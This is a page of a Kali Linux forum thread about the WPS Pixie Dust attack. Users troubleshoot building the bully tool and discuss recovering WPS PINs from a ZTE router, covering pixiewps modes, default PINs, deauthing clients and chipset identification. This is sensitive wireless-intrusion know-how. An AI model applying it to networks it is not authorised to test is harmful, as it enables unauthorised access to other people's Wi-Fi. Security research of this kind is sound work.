Page 48 of 58 FirstFirst ... 384647484950 ... LastLast
Results 471 to 480 of 580

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #471
    Senior Member
    Join Date
    Sep 2013
    Posts
    262
    Is there any benefit over reaver
    Without any doubt If you use a Ralink USB (RT3070, RT3072, RT3570, RT3572 ) as they works very bad with reaver
    For the rest of chipset it is more or less the same, try and you wil see which you like more.
    or more vulnerabilty to other routers??
    Both uses pixiewps and will exploit exactly the sames vulnerabilities

  2. #472
    Junior Member
    Join Date
    Apr 2015
    Location
    cosmoland
    Posts
    17
    soxrok2212 tnx for reply
    but this is the result
    ERROR
    I use kali 2.

    apt-get install libpcap-dev
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    The following extra packages will be installed:
    libpcap0.8-dev......

    .................................................. ...........
    Cd bully/src
    Make
    compilation terminated.
    Makefile:19: recipe for target 'bully' failed
    make: *** [bully] Error 1
    Last edited by slmafiq; 2016-01-08 at 10:51 AM.

  3. #473
    Senior Member
    Join Date
    Aug 2013
    Location
    lost in space
    Posts
    580
    download again > decompress in /root so you have a bully-master folder. Then

    Code:
    cd /root/bully-master/src
    make
    make install
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  4. #474
    Junior Member
    Join Date
    Apr 2015
    Location
    cosmoland
    Posts
    17
    Quote Originally Posted by Quest View Post
    download again > decompress in /root so you have a bully-master folder. Then

    Code:
    cd /root/bully-master/src
    make
    make install
    I made it this way
    wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
    cd '/root/bully-master/src'
    make
    sudo make install
    But have error

  5. #475
    Senior Member
    Join Date
    Mar 2013
    Location
    milano
    Posts
    301
    Quote Originally Posted by slmafiq View Post
    I made it this way
    wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
    cd '/root/bully-master/src'
    make
    sudo make install
    But have error
    what "type of error"??
    post here!!
    if this is "RELATED to dependancies" try first:

    apt-get -y install build-essential libpcap-dev libssl-dev aircrack-ng pixiewps

    after

    cd '/root/bully-master/src'
    make
    sudo make install
    I'm a g0at

  6. #476
    Junior Member
    Join Date
    Apr 2015
    Location
    cosmoland
    Posts
    17
    Thanks zimmaro!
    I installed bully successfully!

    apt-get update
    apt-get -y install build-essential
    apt-get install libpcap-dev
    apt-get install libssl-dev

  7. #477
    Senior Member
    Join Date
    Sep 2013
    Posts
    262
    Crazy thing...
    I am testing a ZTE device (ZTE H218N) that is used byt the ISP jazztel (spain)
    The device had PIN 12345670 enabled by default. A cople of years ago jaztel made un update to "disable" WPS
    My guess is that they "unconfigured" the PIN or voluntary broke the protocol at some p๒int.
    The routers appears in wash....
    Majority of time i get a continuous fail with our tools...

    But at some point... i get an M1, send an M2 receive an m3 and pixiewps is launched
    Look at that :
    Incredible....
    The PKE is exactly the same than for the realteck devices that are suported by pixiewps
    and
    E-HASH 1 = E-HASH2

    The fact to see again this PKE is pure madness
    This PKE repeated all the time was the starting point of the disovery of the breach for realteck....
    And we see it again on broadcom chipset ...

    And what about this unconceivable same value for Ehash1 and Ehash2?
    It would mean that ES1 = ES2 and PSK1=PSK2....
    ES1 and ES2 are not equal to 0 like for the ralink otherwise i would have get the results.
    PSK1=PSK2 would be only possible if the PIN is 00000000
    I tried to launch with 0000000 and didn't get nothing.

    It is also strange to be able to send an m2 sometimes and that maybe something to dig for other purposes (check https://forums.kali.org/showthread.p...ight=reboot+ap)

    This unsupported broadcom device with PIN mode broken has a very strange behavior....

    the chipset is according to the wiki devi :
    SoC Ram Flash Network USB Serial JTag
    Broadcom BCM5357 64MiB 16MiB 5 GbE Yes 2x v2.0 ? ?
    Last edited by kcdtv; 2016-01-17 at 07:10 PM.

  8. #478
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    If you supply PIN 12345670 does it still recover the PSK? I think we briefly discussed this a LOOOOOONG time ago in a chat... The only reason I can think of off the top of my head is that the PIN is not configured and the router is just sending random data... but then again the static PKe is too... provoking to ignore. Do you have any more ZTE H218N's you can test this on?

    UPDATE: I wonder if the network is using another device to as the enrollee. Perhaps something like this is going on? Or try deauthing all the clients and see if you get the same result.
    Attached Images Attached Images
    Last edited by soxrok2212; 2016-01-17 at 09:14 PM.

  9. #479
    Member
    Join Date
    Mar 2015
    Posts
    47
    The new pixiewps when modes are not specified uses the Pke to try to determine the target. This means it's trying only for Realtek. You should trying manually specifying all the modes --mode 1,2,3,4,5.

    Also in case of Ralink devices with push button active, the 2 hashes are identical because of pin and secret hashes equal to 0.

    In the beacon frame there could be the chipset vendor. It's under 'Tag vendor specific'.

    UPDATE: seems aanarchyy 's Bully doesn't run with --force. The nonce generated seems to be compatible with a Realtek device. I recommend again to test it manually and check in the beacon frame if the vendor information is present.
    Last edited by wiire; 2016-01-17 at 11:12 PM.

  10. #480
    Senior Member
    Join Date
    Sep 2013
    Posts
    262
    Hi soxrok2212, Hi wiire

    first of all it seems that the "wikidevi" is wrong or they may be several version of the device... The point is that the chipset appears to be a realteck one instead of a BCM:

    thanks for the trick wiire : i always looked in the WPS tags and didn't noticed that information could be gathered there.
    That would explain the presence of our "provocative PKE" in the M' messages.
    It doesn't explain why pixiewps didn't launched a long bruteforce (i tried with --force or mode 3 --force / and i tryed every mode separatly)
    This case is definitely less weird/interesting than what i thought first as i thought it was a broadcom device.
    i managed to repeat once this "fake" pixie dust and i got the realtek PKE (as expected) and two identical ehash again. (like the first time, not the same ehash than the first time but the same ehash1 and ehash2 )
    i get a strange error if i put the stdout here (with our without code-quote)... If somebody wants it ask me by PM and i will PM it to you. (or you can get it form here : https://www.wifi-libre.com/topic-335...ado.html#p1776)
    Quote Originally Posted by soxrok2212
    If you supply PIN 12345670 does it still recover the PSK?
    Never ever since the firmware update (around 2014)
    Just from time to time you would get enough for a pixiedust... nothing else (never get a M5 or more)
    Quote Originally Posted by soxrok2212
    discussed this a LOOOOOONG time ago in a chat... The only reason I can think of off the top of my head is that the PIN is not configured and the router is just sending random data
    Yes indeed.
    By seeing this realteck PKE in what was supposed to be braadcom router i got emotionalized and thought that this datas may lead to something to discover another weakness in some unsupported broadcom.
    But this ZTE router definitely have a realteck chipset...
    Thanks for your "lights" about this.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •